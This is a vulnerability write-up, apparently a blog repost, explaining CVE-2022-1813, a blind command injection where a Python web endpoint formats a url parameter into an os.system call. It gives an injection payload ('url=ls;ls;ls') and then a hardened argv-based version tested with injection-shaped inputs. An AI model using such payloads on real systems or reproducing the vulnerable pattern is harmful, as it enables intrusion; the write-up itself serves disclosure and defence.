CVE-2022-1813 Blind Command Injection

1 year ago 94

This bug was found by Abdulrahman Abdullah. The target is a Python-based web application in which the url parameter is not properly checked, which lets an attacker inject a system command.

class CMSDetector(APIView):
    def get(self, request):
        req = self.request
        url = req.query_params.get('url')  # untrusted query-string value, no validation
        #save_db = True if 'save_db' in req.query_params else False
        response = {'status': False}
        try:
            response = get_cms_details(url)  # passed through unchanged
        except Exception as e:
            response = {'status': False, 'message': str(e)}
        return Response(response)

In this code you can see that the url parameter is stored in the variable url and then used as the argument to the get_cms_details function on the 8th line. Now let's analyze the get_cms_details function.

def get_cms_details(url):
    # this function will fetch cms details using cms_detector
    response = {}
    cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)  # url formatted straight into a shell command line
    os.system(cms_detector_command)  # the line is handed to /bin/sh for execution
    response['status'] = False
    response['message'] = 'Could not detect CMS!'
    parsed_url = urlparse(url)
    domain_name = parsed_url.hostname
    port = parsed_url.port
    find_dir = domain_name
    if port:
        find_dir += '_{}'.format(port)

    print(url)
    print(find_dir)

Now, on the 4th line, the cms_detector_command variable holds the result of 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url).

Let's simplify it. It will look like this:

python3 /usr/src/github/CMSeeK/cmseek.py -u url --random-agent --batch --follow-redirect

Now if we pass a url of the form url;cmd; the shell evaluates it as two different commands, and the whole command line will look like this:

python3 /usr/src/github/CMSeeK/cmseek.py -u url;cmd;--random-agent --batch --follow-redirect

The first command is "python3 /usr/src/github/CMSeeK/cmseek.py -u url" and the second is whatever command we pass; the remaining "--random-agent --batch --follow-redirect" becomes a third, broken command. Now let's look at how a payload for this command injection is constructed:

http:///api/tools/cms_detector/?format=json&url=ls;ls;ls

This is the final payload for successful exploitation
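The same command built the safe way, as an added example that is not the application's own code: the URL is validated and then passed to CMSeeK as a single argv element with shell=False, so a `;` in the parameter can never end the cmseek command. The CMSeeK path is the one shown above; `validate_target`, `build_argv` and `run_cms_detector` are names chosen here, and the injectable `runner` lets the code run without CMSeeK installed.

```python
import re
import subprocess
from urllib.parse import urlparse

CMSEEK = '/usr/src/github/CMSeeK/cmseek.py'   # path as it appears on the page
# Hostnames: letters, digits, dots and hyphens only (IPv6 literals are
# deliberately not accepted here). Anything else is rejected before use.
_HOST_RE = re.compile(r'^[A-Za-z0-9.-]+$')


def build_command_vulnerable(url):
    # The pattern from the page: the raw parameter is formatted into a shell
    # line that os.system() hands to /bin/sh, so ';' terminates the cmseek command.
    return 'python3 {} -u {} --random-agent --batch --follow-redirect'.format(CMSEEK, url)


def validate_target(url):
    # Accept only absolute http(s) URLs whose hostname is plain DNS characters.
    # This also keeps find_dir (built from hostname and port) free of junk.
    parsed = urlparse(url)
    if parsed.scheme not in ('http', 'https'):
        raise ValueError('url must start with http:// or https://')
    host = parsed.hostname
    if not host or not _HOST_RE.match(host):
        raise ValueError('url hostname contains unexpected characters')
    _ = parsed.port  # raises ValueError if the port is not a valid integer
    return url


def build_argv(url):
    # argv list: the URL is exactly one element and is never re-parsed by a shell.
    return ['python3', CMSEEK, '-u', validate_target(url),
            '--random-agent', '--batch', '--follow-redirect']


def run_cms_detector(url, runner=subprocess.run):
    # shell=False with a list means no ';' splitting and no command substitution.
    # `runner` is injectable so the function can be exercised without CMSeeK.
    argv = build_argv(url)
    completed = runner(argv, shell=False, capture_output=True, text=True, timeout=600)
    return completed.returncode


if __name__ == '__main__':
    # constructed sample inputs: one benign URL and two injection-shaped values
    for candidate in ('http://example.com/', 'ls;ls;ls', 'http://example.com;id'):
        try:
            print(candidate, '->', build_argv(candidate))
        except ValueError as exc:
            print(candidate, '-> rejected:', exc)
```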
